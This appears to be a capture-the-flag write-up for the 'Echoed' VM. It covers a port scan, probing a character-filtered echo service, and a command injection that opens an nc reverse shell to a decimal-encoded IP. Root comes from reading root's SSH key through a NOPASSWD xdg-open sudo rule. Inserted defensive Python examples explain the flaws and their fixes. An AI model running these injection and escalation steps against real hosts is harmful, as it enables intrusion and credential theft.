hack-my-vm-echoed

Port scan

kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.178.173                                                                               [21:27:48]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-21 21:29 CST
Nmap scan report for 192.168.178.173
Host is up (0.0022s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
4444/tcp open krb524
MAC Address: 08:00:27:EC:6C:26 (Oracle VirtualBox virtual NIC)

Three ports are open.

Service enumeration

kali@kali [~] ➜  curl http://192.168.178.173                                                                                                     [21:31:49]
If you dont see Command: prompt in the XXXX port, please restart the VM.
kali@kali [~] ➜  gobuster dir --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.178.173                  [21:32:21]
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.178.173
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 220561 / 220562 (100.00%)
===============================================================
Finished
===============================================================

The web port probably has nothing more to offer. The hint is clear enough: it must be about port 4444, so let's connect to it with nc first.

kali@kali [~] ➜  nc 192.168.178.173 4444                                                                                                         [22:02:03]
Command:id
Found illegal char.Command:

It looks like some characters are filtered so that certain ones cannot be entered. Next I typed almost every character on the keyboard to test them, and found the following:

Found illegal char.Command:y
Executing:echo "y"
y

First, the executed command takes the form echo "y". I wrote the whole interaction into x.txt:

kali@kali [~] ➜  cat x.txt                                                                                                                       [21:35:37]
Command:id
Found illegal char.Command:q
Found illegal char.Command:w
Executing:echo "w"
w
Command:e
Executing:echo "e"
e
Command:r
Found illegal char.Command:t
Found illegal char.Command:y
Executing:echo "y"
y
Command:u
Found illegal char.Command:i
Executing:echo "i"
i
Command:o
Found illegal char.Command:p
Found illegal char.Command:[
Executing:echo "["
[
Command:]
Executing:echo "]"
]
Command:a
Executing:echo "a"
a
Command:s
Executing:echo "s"
s
Command:d
Found illegal char.Command:f
Executing:echo "f"
f
Command:g
Found illegal char.Command:h
Executing:echo "h"
h
Command:j
Found illegal char.Command:k
Found illegal char.Command:l
Found illegal char.Command:;
Executing:echo ";"
;
Command:'
Executing:echo "'"
'
Command:z
Executing:echo "z"
z
Command:x
Executing:echo "x"
x
Command:c
Executing:echo "c"
c
Command:v
Found illegal char.Command:b
Executing:echo "b"
b
Command:n
Executing:echo "n"
n
Command:m
Found illegal char.Command:,
Found illegal char.Command:.
Found illegal char.Command:/
Executing:echo "/"
/
Command:<
Executing:echo "<"
<
Command:>
Executing:echo ">"
>
Command:?
Found illegal char.Command::
Executing:echo ":"
:
Command:"
Command:{
Executing:echo "{"
{
Command:}
Executing:echo "}"
}
Command:1
Executing:echo "1"
1
Command:2
Executing:echo "2"
2
Command:3
Executing:echo "3"
3
Command:4
Executing:echo "4"
4
Command:5
Executing:echo "5"
5
Command:6
Executing:echo "6"
6
Command:7
Executing:echo "7"
7
Command:8
Executing:echo "8"
8
Command:9
Executing:echo "9"
9
Command:0
Executing:echo "0"
0
kali@kali [~] ➜  cat x.txt | awk '{if(length == 1){printf $0" "}}'                                                                               [22:04:40]
w e y i [ ] a s f h ; ' z x c b n / < > : { } 1 2 3 4 5 6 7 8 9 0

I only tested the common characters. The double quote is missing from this list because when we enter a double quote the command becomes echo """, which prints nothing.

bash works, bin works, nc works, / works, and digits work.

Since . is not allowed and the IP address for the reverse shell is bound to contain dots, the IP address has to be handled somehow; the simplest way is to convert it to a plain number.

Because the server runs echo "command", we have to close the quotes: echo "{";reverse shell;"}", so our input should be the part inside the curly braces.

Command:";nc -e /bin/bash 3232281229 8888;" 
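Added example (not code from the original write-up or from the Echoed VM), looking at the same service from the defender's side. The port-4444 source is not on the page, so the filter below is an assumption reconstructed from the awk output above (plus `"`, space and `-`, which the accepted input contains). It shows three things the write-up implies but does not spell out: the per-character blocklist rejects a harmless `id` (because `d` is illegal) while accepting the quoted input above; a dotted IPv4 address and its 32-bit integer are the same address, so blocking `.` blocks nothing (the write-up's 3232281229 decodes to 192.168.178.141); and a command built as `echo "<input>"` is fixed by shell-quoting the argument or, better, by not using a shell at all. The input string is analysed as text only, never executed, and `split_unquoted_semicolons` is a simplified model of how sh splits a line, not a full parser.

```python
"""Added example, not code from the original write-up or from the Echoed VM.
It models the port-4444 service as the write-up observed it (the real source is
not on the page, so the filter below is an assumption), shows why a character
blocklist is no defence for a command built as  echo "<input>", and shows the
two fixes: quote the argument, or better, never hand it to a shell at all."""
import ipaddress
import shlex

# Characters the write-up saw pass the filter (from the awk output), plus '"',
# ' ' and '-', which the accepted input contains.  Constructed; assumption.
OBSERVED_ALLOWED = set("weyi[]asfh;'zxcbn/<>:{}1234567890") | set('" -')

# The input string quoted in the write-up; analysed here as text only, never run.
PAYLOAD = '";nc -e /bin/bash 3232281229 8888;"'


def blocklist_passes(user_input: str) -> bool:
    """Assumed model of the target's check: every character must be on the list."""
    return all(ch in OBSERVED_ALLOWED for ch in user_input)


def ipv4_to_decimal(dotted: str) -> int:
    """Dotted quad -> the same address as one 32-bit integer (no dots needed)."""
    return int(ipaddress.IPv4Address(dotted))


def decimal_to_ipv4(value: int) -> str:
    """Inverse: recover the dotted form, e.g. when reviewing a connection log."""
    return str(ipaddress.IPv4Address(value))


def build_vulnerable(user_input: str) -> str:
    """What the service does, per its 'Executing:echo "y"' echo: raw interpolation."""
    return f'echo "{user_input}"'


def build_hardened(user_input: str) -> str:
    """Fix 1: shell-quote the argument, so '"' and ';' stay literal characters."""
    return "echo " + shlex.quote(user_input)


def argv_hardened(user_input: str) -> list:
    """Fix 2 (preferred): an argv list for subprocess.run(..., shell=False).
    No shell ever parses ';' or quotes, so no character filter is needed."""
    return ["echo", user_input]


def split_unquoted_semicolons(command: str) -> list:
    """Simplified model of how sh splits a line into commands: ';' separates
    commands unless it sits inside single or double quotes."""
    parts, buf, quote = [], [], None
    for ch in command:
        if quote:                       # inside a quoted string
            if ch == quote:
                quote = None
            buf.append(ch)
        elif ch in ('"', "'"):          # opening quote
            quote = ch
            buf.append(ch)
        elif ch == ";":                 # unquoted separator: a new command starts
            parts.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf).strip())
    return [p for p in parts if p]


if __name__ == "__main__":
    print(blocklist_passes("id"), blocklist_passes(PAYLOAD))    # False True
    print(decimal_to_ipv4(3232281229))                           # 192.168.178.141
    print(split_unquoted_semicolons(build_vulnerable(PAYLOAD)))  # three commands
    print(split_unquoted_semicolons(build_hardened(PAYLOAD)))    # one command
```

The vulnerable template yields three commands once the first `"` closes the string; the quoted template yields one, with the whole input as a literal argument. Even an allowlist would not have saved this service, because the real defect is interpolating input into a shell line; `argv_hardened` removes that line altogether.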

Privilege escalation

charlie@echoed:~$ sudo -l
Matching Defaults entries for charlie on echoed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charlie may run the following commands on echoed:
(ALL : ALL) NOPASSWD: /usr/bin/xdg-open

Ask GPT

xdg-open uses your current desktop environment (GNOME, KDE, XFCE, etc.) to pick the corresponding default program and open:

Files (images, PDFs, documents, etc.)
Folders
URLs (in the default browser)

So it can open files, it seems.
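Added example (not from the original write-up): a small auditor for `sudo -l` output that flags NOPASSWD rules whose command hands the target file to another program chosen at run time, which is what makes the rule above equivalent to root-level read access to any file. The `DELEGATING_LAUNCHERS` set is an assumption seeded only from what this write-up demonstrates with xdg-open; the sample text is constructed from the write-up's own `sudo -l` output plus one made-up password-protected rule for contrast.

```python
"""Added example, not code from the original write-up: a small auditor for
'sudo -l' output that flags NOPASSWD rules whose command hands the target file
to another program chosen at run time.  The write-up shows why that matters:
xdg-open, run as root, displayed /root/.ssh/id_rsa.  The launcher set below is
an assumption drawn from that observation, and the sample text is constructed
from the write-up's own sudo -l output plus one made-up rule for contrast."""
import os
import re

# Commands that delegate to a pager/editor/browser/handler picked at run time.
# Assumption: seeded only with what the write-up demonstrated.
DELEGATING_LAUNCHERS = {"xdg-open"}

# Constructed sample: the write-up's rule plus one password-protected rule.
SAMPLE_SUDO_L = """\
Matching Defaults entries for charlie on echoed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User charlie may run the following commands on echoed:
    (ALL : ALL) NOPASSWD: /usr/bin/xdg-open
    (root) /usr/bin/systemctl restart nginx
"""

# One rule line: (runas) [TAG: ...]* command[, command]*
RULE_RE = re.compile(r"^\(([^)]*)\)\s+((?:[A-Z]+:\s*)*)(.+)$")


def parse_sudo_l(text: str) -> list:
    """Return one dict per command in the 'may run the following commands' section."""
    rules, in_rules = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_rules = True          # everything after this header is a rule
            continue
        if not in_rules:
            continue                 # skip the Defaults block
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, tags, commands = m.groups()
        tag_set = {t.strip() for t in tags.split(":") if t.strip()}
        for cmd in commands.split(", "):
            rules.append({
                "runas": runas.strip(),
                "nopasswd": "NOPASSWD" in tag_set,
                "command": cmd.strip(),
            })
    return rules


def flag_risky(rules: list) -> list:
    """NOPASSWD rules whose binary is a delegating launcher: as the write-up's
    id_rsa read shows, that is root-level read access to arbitrary files."""
    risky = []
    for rule in rules:
        binary = os.path.basename(rule["command"].split()[0])
        if rule["nopasswd"] and binary in DELEGATING_LAUNCHERS:
            risky.append(rule)
    return risky


if __name__ == "__main__":
    for r in flag_risky(parse_sudo_l(SAMPLE_SUDO_L)):
        print("RISKY:", r["runas"], "NOPASSWD", r["command"])   # flags xdg-open
```

On a real host the input would be the text of `sudo -l` for each account being reviewed; the fix for a flagged rule is to grant the specific action the user needs (a wrapper script with a fixed argument, or a narrower command) rather than a launcher that opens whatever path it is given.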

charlie@echoed:~$ sudo /usr/bin/xdg-open /root/.ssh/id_rsa
WARNING: terminal is not fully functional
/root/.ssh/id_rsa (press RETURN)-----BEGIN OPENSSH PRIVATE KEY-----[key body not present in this copy of the page].ssh/id_rsaz6hTWng1LXgZ0EUBMqN5tCcGgTHvAeykiWpjl/zrK5QjDmjhKzYaHPBI/sUdgVA8o2R8ne
:hbS9N2ogWiJAF/XaU5behAdg1lTkfk6xNpF/1CVuK2gItW7yF1AGLMPLhD8nVlyx1429Ln
:eysx2HEd+7b7p0dU7QAAAAtyb290QGVjaG9lZAECAwQFBg==
:-----END OPENSSH PRIVATE KEY-----

The tail end is a bit garbled and needs a little tidying up before it can be used.

kali@kali [~] ➜  ssh -i y root@192.168.178.173                                                                                                   [22:36:02]
Linux echoed 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Dec 17 02:25:52 2020
root@echoed:~#